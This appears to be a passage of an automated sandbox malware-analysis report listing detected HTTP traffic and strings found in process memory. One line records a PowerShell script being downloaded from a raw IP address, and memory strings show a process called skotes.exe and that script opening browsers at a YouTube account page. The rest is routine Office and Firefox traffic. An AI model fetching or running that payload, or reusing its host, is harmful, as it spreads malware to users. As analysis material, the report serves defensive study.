Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /files/5124158732/KQGBYWk.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: 14287614-3088-4146-9848-cff2ed487ea7.tmp.17.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 000003.log.17.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log.17.dr String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log.17.dr String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3108663751.000001A8B8B3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3090481370.0000000008657000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account ? equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3065741269.00000000075AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation(% equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.2989914534.0000000002E45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account C:\Program Files\Mozilla Firefox\firefox.exe equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]q https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, KQGBYWk[1].ps1.6.dr, KQGBYWk.ps1.6.dr String found in binary or memory: $url = "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3228844860.000001A8B6057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3299129330.000001A8A5CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263352248.000001A8C37F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
